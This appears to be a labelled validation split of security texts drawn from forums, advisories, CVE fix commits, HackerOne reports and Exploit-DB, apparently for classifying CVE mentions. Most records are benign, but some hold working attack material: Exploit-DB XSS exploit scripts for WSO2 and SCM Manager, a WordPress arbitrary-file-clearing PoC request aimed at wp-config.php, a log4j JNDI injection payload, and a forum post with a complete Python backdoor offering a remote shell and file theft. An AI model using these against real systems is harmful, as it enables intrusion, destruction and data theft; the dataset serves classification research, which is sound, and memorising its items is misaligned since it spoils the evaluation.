+{"id": "58d550be420ca2cb0039", "text": "if it doesnt appear that there is an alias make sure you are running the basic powershell and not “powershell ISE” https://devblogs.microsoft.com/scripting/understanding-the-six-powershell-profiles/", "source": "hackthebox", "timestamp": "2023-06-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "79c54f5bca2c6027a16a", "text": "OpenCart Cross-site Scripting\n\n[Severity: MEDIUM]\n\nOpenCart 3.0.3.3 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section because of a lack of entity encoding. NOTE: this issue exists because of an incomplete fix for CVE-2020-10596. \nThe vendor states \"this is not a massive issue as you are still required to be logged into the admin.\"", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "09c596457f5db3940a35", "text": "CVE: CVE-2022-0472\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in Packagist jsdecena/laracom prior to v2.0.9.'}]\n\nFix commit: Fix vulnerability report from hunter.dev", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "73290eb7fe2697662f55", "text": "Complete Newbie/Novice - Help Required Please :)\n\nHi All, Its my 2nd day on HTB and i’ve come unstuck (already) on ‘Dancing’ - Machine 3. I’m at the stage of accessing smbclient through - $ smbclient \\\\10.129.42.109\\WorkShares - but keep getting the following in response: Password for [WORKGROUP\\htb-********: do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND) P.S - I also keep getting the above message for ADMIN$ + C$. Can anyone help please. Thank you in advance!", "source": "hackthebox", "timestamp": "2023-11-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d5a59fe44e1c5eb873ac", "text": "Hi I’m stuck with the first question in the course around default credentials . I have modified the given script which takes in a csv file fine and I have used all combinations from the all technologies listed here: https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv . I also believe that row 12 relates to the technology here. Where the question says, “Inspect the login page and perform a bruteforce attack. What is the valid username?” I’m taking the question to actually mean: do a bruteforce by hand, just trying a small set of credentials from the link above to deduce the username only ( the PW is not even relevant). Based on row 12 of the csv in the link above, this looks pretty simple; but doesn’t work. Presupposing I understand this all correctly, Would someone be so kind to tell me, What am I missing, please? …and put me out of my misery. Warm regards", "source": "hackthebox", "timestamp": "2023-02-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4bf91e8babb903c53da4", "text": "After learning subnetting and network protocols, learn each basic tool like nmap and wireshark. Use a virtual machine and Metasploitable (2 and 3) to learn Metasploit. Eventually try doing exercises on places like hackthebox.com . I use YouTube to watch thousands of videos on Linux, math, programming and network security.", "source": "parrotsec", "timestamp": "2022-04-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a57778a89b456e1b1646", "text": "JRuby denial of service via Hash Collision\n\n[Severity: MEDIUM]\n\nJRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3c7713f707661dddaa2c", "text": "Concurrent Execution using Shared Resource with Improper Synchronization in pyftpdlib\n\n[Severity: HIGH]\n\nRace condition in the FTPHandler class in ftpserver.py in pyftpdlib before 0.5.2 allows remote attackers to cause a denial of service (daemon outage) by establishing and then immediately closing a TCP connection, leading to the accept function having an unexpected value of None for the address, or an ECONNABORTED, EAGAIN, or EWOULDBLOCK error, a related issue to CVE-2010-3492.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b6099e43b35887cab169", "text": "CVE: CVE-2022-0156\n\n[{'lang': 'en', 'value': 'vim is vulnerable to Use After Free'}]\n\nFix commit: patch 8.2.4040: keeping track of allocated lines is too complicated\n\nProblem: Keeping track of allocated lines in user functions is too\n complicated.\nSolution: Instead of freeing individual lines keep them all until the end.", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "cc92341925df7a611f58", "text": "[Use of Externally-Controlled Format String] ██████████ running a vulnerable log4j\n\n**Description:**\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://████████/███████https%3A%2F%2F█████████%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6bd700c420721056d933", "text": "I’m currently stuck on digging in, either i’m stupid or is has something to do with dig /dns enumeration, can anyone give me a small hint? and why i can readout the flag for overflown?", "source": "hackthebox", "timestamp": "2022-10-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "688d33773b1b889a66d8", "text": "Hi. It doesn’t concern Parrot but the tool you are using more. Did you compiled it and installed it correctly? Do some tests.", "source": "parrotsec", "timestamp": "2022-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8564ab3df3c28d85046a", "text": "HOW?!?! I’ve got the reverse shell - is it a priv escalation or is that not what they’re looking for? Is there a way to make the msfvenom payload “cat /root/flag.txt” instead of the reverse shell?", "source": "hackthebox", "timestamp": "2022-11-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "346e9c3ed01d323f790a", "text": "That sounds like a fantastic idea! Engaging with experienced CTF players will undoubtedly enhance your skills and expose you to different problem-solving approaches. Collaborating with them in CTF competitions can be a fun and educational experience. Good luck finding and connecting with those cool people! Enjoy the CTF challenges and happy hacking!", "source": "hackthebox", "timestamp": "2023-08-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c0b283e4d46a08844bfc", "text": "WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)\n\n# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)\n# Date: 21 Apr 2022\n# Exploit Author: cxosmo\n# Vendor Homepage: https://wso2.com\n# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)\n# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;\n # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;\n # API Microgateway 2.2.0;\n # Data Analytics Server 3.2.0;\n # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;\n # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;\n # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;\n # Identity Server Analytics 5.5.0 and 5.6.0;\n # WSO2 Micro Integrator 1.0.0.\n# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)\n# CVE: CVE-2022-29548\n\nimport argparse\nimport logging\nimport urllib.parse\n\n# Global variables\nVULNERABLE_ENDPOINT = \"/carbon/admin/login.jsp?loginStatus=false&errorCode=\"\nDEFAULT_PAYLOAD = \"alert(document.domain)\"\n\n# Logging config\nlogging.basicConfig(level=logging.INFO, format=\"\")\nlog = logging.getLogger()\n\ndef generate_payload(url, custom_payload=False):\n log.info(f\"Generating payload for {url}...\")\n if custom_payload:\n log.info(f\"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//\")\n else:\n log.info(f\"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//\")\n\ndef clean_url_input(url):\n if url.count(\"/\") > 2:\n return f\"{url.split('/')[0]}//{url.split('/')[2]}\"\n else:\n return url\n\ndef check_payload(payload):\n encoded_characters = ['\"', '<', '>']\n if any(character in payload for character in encoded_characters):\n log.info(f\"Unsupported character(s) (\\\", <, >) found in payload.\")\n return False\n else:\n return urllib.parse.quote(payload)\n\nif __name__ == \"__main__\":\n # Parse command line\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)\n required_arguments = parser.add_argument_group('required arguments')\n required_arguments.add_argument(\"-t\", \"--target\",\n help=\"Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)\",\n required=\"True\", action=\"store\")\n parser.add_argument(\"-p\", \"--payload\",\n help=\"Use custom JavaScript for generated payload (Some characters (\\\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))\",\n action=\"store\", default=False)\n args = parser.parse_args()\n\n # Clean user target input\n args.target = clean_url_input(args.target.lower())\n\n # Check for unsupported characters in custom payload; URL-encode as required\n if args.payload:\n args.payload = check_payload(args.payload)\n if args.payload:\n generate_payload(args.target, args.payload)\n else:\n generate_payload(args.target)", "source": "exploitdb", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2c32bb255c945e9a4640", "text": "Withdrawn Advisory: ReDoS in py library when used with subversion \n\n[Severity: HIGH]\n\n### Withdrawn Advisory\nThis advisory has been withdrawn because evidence does not suggest that CVE-2022-42969 is a valid, reproducible vulnerability. This link is maintained to preserve external references.\n\n### Original Description\nThe py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.\n\nThe particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.", "source": "github_advisory", "timestamp": "2022-10-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d898419dcfb849391a76", "text": "SQL injection question\n\nHey! I am searching for my first bug and have a question. If I try to inject SQL query i get “Access Denied” error: q2 736×34 5.46 KB But if i double encode this query it loads the page, but gives me non-empty result (my query “AND 2=1” should always be false) q1 1064×50 6.61 KB My question is - does this mean that there is an SQL injection and double encoding bypasses filter?", "source": "hackersploit", "timestamp": "2022-06-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "83dd2e078d46c6bf7203", "text": "CVE: CVE-2022-24772\n\n[{'lang': 'en', 'value': 'Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.'}]\n\nFix commit: Fix signature verification issues.\n\n**SECURITY**: Three RSA PKCS#1 v1.5 signature verification issues were\nreported by Moosa Yahyazadeh (moosa-yahyazadeh@uiowa.edu):\n\n- Leniency in checking `digestAlgorithm` structure can lead to signature\n forgery.\n - The code is lenient in checking the digest algorithm structure. This can\n allow a crafted structure that steals padding bytes and uses unchecked\n portion of the PKCS#1 encoded message to forge a signature when a low\n public exponent is being used.\n- Failing to check tailing garbage bytes can lead to signature forgery.\n - The code does not check for tailing garbage bytes after decoding a\n `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed\n and garbage data added to forge a signature when a low public exponent is\n being used.\n- Leniency in checking type octet.\n - `DigestInfo` is not properly checked for proper ASN.1 structure. This can\n lead to successful verification with signatures that contain invalid\n structures but a valid digest.\n\nFor more information, please see \"Bleichenbacher's RSA signature forgery based\non implementation error\" by Hal Finney:\nhttps://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/\n\nFixed with the following:\n\n- [asn1] `fromDer` is now more strict and will default to ensuring all\n input bytes are parsed or throw an error. A new option `parseAllBytes`\n can disable this behavior.\n - **NOTE**: The previous behavior is being changed since it can lead\n to security issues with crafted inputs. It is possible that code\n doing custom DER parsing may need to adapt to this new behavior and\n optional flag.\n- [rsa] Add and use a validator to check for proper structure of parsed\n ASN.1 `RSASSA-PKCS-v1_5` `DigestInfo` data. Additionally check that\n the hash algorithm identifier is a known value. An invalid\n `DigestInfo` or algorithm identifier will now cause an error to be\n thrown.\n- [oid] Added `1.2.840.113549.2.2` / `md2` for hash algorithm checking.\n- [tests] Tests were added for all of the reported issues. A private\n verify option was added to assist in checking multiple possible\n failures in the test data.", "source": "cvefixes", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e851d8383c7dc1170db9", "text": "CVE: CVE-2022-31082\n\n[{'lang': 'en', 'value': 'GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. glpi-inventory-plugin is a plugin for GLPI to handle inventory management. In affected versions a SQL injection can be made using package deployment tasks. This issue has been resolved in version 1.0.2. Users are advised to upgrade. Users unable to upgrade should delete the `front/deploypackage.public.php` file if they are not using the `deploy tasks` feature.'}]\n\nFix commit: Merge pull request from GHSA-q6m7-h6rj-5wmw", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6e8d945cc0d9dadffdbb", "text": "Getting started | privilege escalation | quick solve Step 6: use this command to view the /flag.txt file example; cat flag.txt Hi, I’ve got one question? have you ever tried this yourself? because this → “Step 6: use this command to view the /flag.txt fileexample; cat flag.txt” does not work. regards SORRY - DISREGARD PLEASE", "source": "hackthebox", "timestamp": "2023-04-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e91557c46bb31467bd53", "text": "[Cross-site Scripting (XSS) - Generic] CVE-2022-23520: Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)\n\nThe following is from: https://hackerone.com/reports/1654310\n\nWhile building a PoC for CVE-2022-32209, I noticed that I could not fix my vulnerable application by updating https://github.com/rails/rails-html-sanitizer from 1.4.2 to 1.4.3 even though the Hackerone report about this vulnerability suggested that this should fix it (see here: https://hackerone.com/reports/1530898).\n\nI built this app with Rails 7.0.3.1 by just running \"rails new\", adding `config.action_view.sanitized_allowed_tags = [\"select\", \"style\"]` to the file `config/application.rb` and creating an endpoint that reflected a parameter after sanitizing it (ERB: `Hello <%= sanitize @name %>
`). When using the payload ` ` for the parameter I got an alert no matter what the version of rails-html-sanitizer was.\n\nI believe the reason is the following. There are two ways you can pass the list of allowed tags to the sanitizer. One is via a list of tags stored in a class attribute, the other is via an argument passed into the `sanitize` method. The fix only considered the second way but the first one was forgotten. See the commit with the fix here: https://github.com/rails/rails-html-sanitizer/commit/c871aa4034d3d80ad67cf33a3462154b0a0fb477#diff-0daf33b9062eb5ccdeae86ed8bf2662a6e8669f1a7db590802b7f3b36ea47426R159\nThe relevant part of the code is this:\n\n```ruby\nmodule Rails\n module Html\n class SafeListSanitizer < Sanitizer\n ...\n def remove_safelist_tag_combinations(tags)\n if !loofah_using_html5? && tags.include?(\"select\") && tags.include?(\"style\")\n warn(\"WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'\")\n tags.delete(\"style\")\n end\n tags\n end\n\n def allowed_tags(options)\n if options[:tags]\n remove_safelist_tag_combinations(options[:tags])\n else\n self.class.allowed_tags\n end\n end\n ...\n end\n end\nend\n```\n\nMethod `remove_safelist_tag_combinations` is introduced to remove `style` from the allow list if `select` is in there. However, within method `allowed_tags` this cleanup is only applied to the tag list in the `options`, not to ` self.class.allowed_tags`, the list stored in the sanitizer class.\nHowever, it seems that the configuration in `config/application.rb` which I've set above put the list into the class variable (I've sprinkled a few `puts` here and there to confirm that).\n\nMoreover, when moving the allow list from `config/application.rb` into the ERB template\n(`Hello <%= sanitize @name, tags: [\"select\", \"style\"] %>
`), the update from\n1.4.2 to 1.4.3 does fix the problem.\n\n## Impact\n\nIt is possible to bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack.", "source": "hackerone", "timestamp": "2023-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2c3e9a73cc8cca3ed6b4", "text": "I will suggest you to use Tortoise Git, which has GUI. Once you have download and installed Tortoise Git, create new folder and then copy git clone url from repository, then, right-click inside new folder in local PC, select Tortoise-Git -> Select \"Clone here\" Pop-up will appear click \"Ok\" to clone repository, (enter your credentials of repository if another pop-up appears)", "source": "go4expert", "timestamp": "2022-05-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b2533b080df7dcee0ec9", "text": "CVE: CVE-2022-2636\n\n[{'lang': 'en', 'value': 'Improper Input Validation in GitHub repository hestiacp/hestiacp prior to 1.6.6.'}]\n\nFix commit: Fix security issues in v-add-web-domain-redirect + Sync up main with release (#2814)\n\n* Fix v-add-web-domain-redirect\r\n\r\n* Remove sudo permission admin group on new setups\r\n\r\nWe delete the group before install anyway\r\n\r\n* Block \"sudo\" from\r\n\r\n* Add missing slash\r\n\r\n* Update changelog\r\n\r\n* Update versions", "source": "cvefixes", "timestamp": "2022-08-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "440271450da77075707f", "text": "SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)\n\n#!/usr/bin/python3\n\n# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)\n# Google Dork: intitle:\"SCM Manager\" intext:1.60\n# Date: 05-25-2023\n# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)\n# Vendor Homepage: https://scm-manager.org/\n# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/\n# Version: 1.2 <= 1.60\n# Tested on: Debian based\n# CVE: CVE-2023-33829\n\n# Modules\nimport requests\nimport argparse\nimport sys\n\n# Main menu\nparser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')\nparser.add_argument(\"-u\", \"--user\", help=\"Admin user or user with write permissions\")\nparser.add_argument(\"-p\", \"--password\", help=\"password of the user\")\nargs = parser.parse_args()\n\n\n# Credentials\nuser = sys.argv[2]\npassword = sys.argv[4]\n\n\n# Global Variables\nmain_url = \"http://localhost:8080/scm\" # Change URL if its necessary\nauth_url = main_url + \"/api/rest/authentication/login.json\"\nusers = main_url + \"/api/rest/users.json\"\ngroups = main_url + \"/api/rest/groups.json\"\nrepos = main_url + \"/api/rest/repositories.json\"\n\n# Create a session\nsession = requests.Session()\n\n# Credentials to send\npost_data={\n\t'username': user, # change if you have any other user with write permissions\n\t'password': password # change if you have any other user with write permissions\n}\n\nr = session.post(auth_url, data=post_data)\n\nif r.status_code == 200:\n\tprint(\"[+] Authentication successfully\")\nelse:\n\tprint(\"[-] Failed to authenticate\")\n\tsys.exit(1)\n\nnew_user={\n\n\t\"name\": \"newUser\",\n\t\"displayName\": \" \",\n\t\"mail\": \"\",\n\t\"password\": \"\",\n\t\"admin\": False,\n\t\"active\": True,\n\t\"type\": \"xml\"\n\n}\n\ncreate_user = session.post(users, json=new_user)\nprint(\"[+] User with XSS Payload created\")\n\nnew_group={\n\n\t\"name\": \"newGroup\",\n\t\"description\": \" \",\n\t\"type\": \"xml\"\n\n}\n\ncreate_group = session.post(groups, json=new_group)\nprint(\"[+] Group with XSS Payload created\")\n\nnew_repo={\n\n\t\"name\": \"newRepo\",\n\t\"type\": \"svn\",\n\t\"contact\": \"\",\n\t\"description\": \" \",\n\t\"public\": False\n\n}\n\ncreate_repo = session.post(repos, json=new_repo)\nprint(\"[+] Repository with XSS Payload created\")", "source": "exploitdb", "timestamp": "2023-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9f75861e55a4243a9e7f", "text": "What are the vulnerabilities of Windows 10\n\nits just a simple question …", "source": "hackersploit", "timestamp": "2022-08-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1fc8c76d3187d32bbe6a", "text": "I strongly advise against taking any retaliatory action against the scammer. This is not only unethical but also illegal and could result in serious consequences for you. Instead, you should report the scammer to the relevant authorities, such as the FBI's Internet Crime Complaint Center (IC3) or the Federal Trade Commission (FTC). You can also report the scammer to Craigslist, PayPal, and the shipping companies involved. It's important to remember that scammers use various tactics to trick and deceive people, and it's not your responsibility to teach them a lesson. Your priority should be to protect yourself and others by reporting the scam and preventing further harm. In the future, it's important to be cautious when dealing with online transactions and to always verify the legitimacy of the buyer or seller before engaging in any transactions.", "source": "go4expert", "timestamp": "2023-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7fc365d10488ec071df4", "text": "CVE: CVE-2022-31111\n\n[{'lang': 'en', 'value': \"Frontier is Substrate's Ethereum compatibility layer. In affected versions the truncation done when converting between EVM balance type and Substrate balance type was incorrectly implemented. This leads to possible discrepancy between appeared EVM transfer value and actual Substrate value transferred. It is recommended that an emergency upgrade to be planned and EVM execution temporarily paused in the mean time. The issue is patched in Frontier master branch commit fed5e0a9577c10bea021721e8c2c5c378e16bf66 and polkadot-v0.9.22 branch commit e3e427fa2e5d1200a784679f8015d4774cedc934. This vulnerability affects only EVM internal states, but not Substrate balance states or node. You can temporarily pause EVM execution (by setting up a Substrate `CallFilter` that disables `pallet-evm` and `pallet-ethereum` calls before the patch can be applied.\"}]\n\nFix commit: Limit number of iterations in genesis nonce building (#753)", "source": "cvefixes", "timestamp": "2022-07-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6c67a08aa34719fa18e8", "text": "[Missing Required Cryptographic Step] CVE-2022-30115: HSTS bypass via trailing dot\n\ncurl allows users to load a HSTS cache which will cause curl to use HTTPS instead of HTTP given a HTTP URL for a given site specified in the HSTS cache.\n\nIf the trailing dot is used, the HSTS check will be bypassed.\n\nIf a user has a preloaded hsts.txt:\n`````` \n# Your HSTS cache. https://curl.se/docs/hsts.html\n# This file was generated by libcurl! Edit at your own risk.\naccounts.google.com \"20230503 08:47:52\"\n`````` \n\nDoing the following:\n``````\ncurl --hsts hsts.txt http://accounts.google.com.\n``````\n\nWill cause accounts.google.com to be loaded over HTTP\n``````\n \n301 Moved \n301 Moved \nThe document has moved\nhere .\n\n``````\n\nThis issue has been raised in other HTTP clients before such as in https://bugs.chromium.org/p/chromium/issues/detail?id=461481 and https://www.mozilla.org/en-US/security/advisories/mfsa2015-13/\n\n## Impact\n\nHSTS bypass", "source": "hackerone", "timestamp": "2022-05-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "78b8d11efbe6fc147467", "text": "The issue for you and for most from what I see is the dots in the counter. You’re using {1(3dots)28} while you should be using {1(2dots)28}. Made the same mistake.", "source": "hackthebox", "timestamp": "2022-10-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7bc52d06a2dc92a1efb3", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-05-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4601179737899ef2f07e", "text": "here is a python backdoor CLIENT: from socket import * import subprocess import os def connect(): server = socket(AF_INET, SOCK_STREAM) # server ip host = \"192.168.1.8\" port = 111 buffer_size = 1024 print(\"[+] Connecting to {}:{}\".format(host, port)) server.connect((host, port)) print(\"[+] Connected!\") while 1: command = server.recv(1024) command_decoded = command.decode(\"utf-8\") if \"terminate\" in command_decoded: print(\"[!] Connection closed!\") server.close() break elif \"steal\" in command_decoded: file_path = command_decoded.split(\">\") print(\"[+] Start!\") with open(file_path[1], \"rb\") as f: while True: file_bytes = f.read(buffer_size) if not file_bytes: break server.send(file_bytes) end = \"end-transfer-file\".encode(\"ISO-8859-1\") server.send(end) print(\"[+] End!\") else: CMD = subprocess.Popen(command_decoded, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) server.send(CMD.stdout.read()) def main(): connect() main() SERVER: from socket import * PWD = input(\"Where do you want to save your files stealed? \\nExample: /home/nonameon/Desktop/file\\nPath: \") def connect(): # TCP connection sock = socket(AF_INET, SOCK_STREAM) host = \"192.168.1.8\" port = 11 buffer_size = 1024 sock.bind((host, port)) sock.listen(1) while 1: print(\"[+] Listening {}:{}\".format(host, port), end=\"\") client, addr = sock.accept() print(\"\\n[+] Connection from: \", addr) print(\"[?] Use 'steal>' for get file or 'terminate' for close connection\") while 1: command = input(\"Shell> \") if \"terminate\" in command: client.send(\"terminate\".encode()) client.close() print(\"[+] Closed!\") print(\"[+] Listening {}:{}\".format(host, port), end=\"\") break else: #manda client.send(command.encode()) #riceve resp = client.recv(buffer_size) flag = True if \"steal\" in command: file_backdoor = PWD print(\"[+] Start!\") with open(file_backdoor, \"wb\") as f: while True: f.write(resp) resp = client.recv(buffer_size) if \"end-transfer-file\" in resp.decode(\"ISO-8859-1\"): break print(\"[+] End!\") else: print(resp.decode(\"ISO-8859-1\")) def main(): connect() main()", "source": "hackersploit", "timestamp": "2022-03-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0b2b45eed3b4f3ca0f08", "text": "ill have to look up what SHA sum is, but the drive will NOT down load in fat32 no matter how many times i try reformating it before i put it through rufus… is there any way to test the drive ,or is that more a matter of the brand?", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "741d4ad476de5f984802", "text": "WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)\n\n# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)\n# Date: 09-11-2021\n# Exploit Author: Ceylan Bozogullarindan\n# Exploit Website: https://bozogullarindan.com\n# Vendor Homepage: https://bestwebsoft.com/\n# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/\n# Version: 1.1.1\n# Tested on: Linux\n# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)\n\n\n# Description:\n\nError Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!\n\nI've especially emphasized \"clearing a log file\" statement because the feature of \"clearing a log file\" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is \"rrrlgvwr_clear_file_name\". It can be manipulated only authenticated users.\n\nAn attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.\n\n# Steps To Reproduce\n\n1. Install and activate the plugin.\n2. Click the \"Log Monitor\" available under Error Log Viewer menu item.\n3. Choose a log file to clear.\n4. Intercept the request via Burp or any other local proxy tool.\n5. Replace the value of the parameter \"rrrlgvwr_clear_file_name\" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.\n6. Check the content of the cleared file. You will see that the file is empty.\n\n\n# PoC - Supported Materials\n\n---------------------------------------------------------------------------\nPOST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1\nHost: 127.0.0.1:8000\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 603\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: [admin+]\n\nrrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php\n---------------------------------------------------------------------------", "source": "exploitdb", "timestamp": "2022-02-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1b3e6dd15c344b356911", "text": "CVE: CVE-2022-1720\n\n[{'lang': 'en', 'value': 'Buffer Over-read in function grab_file_name in GitHub repository vim/vim prior to 8.2.4956. This vulnerability is capable of crashing the software, memory modification, and possible remote execution.'}]\n\nFix commit: patch 8.2.4956: reading past end of line with \"gf\" in Visual block mode\n\nProblem: Reading past end of line with \"gf\" in Visual block mode.\nSolution: Do not include the NUL in the length.", "source": "cvefixes", "timestamp": "2022-06-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
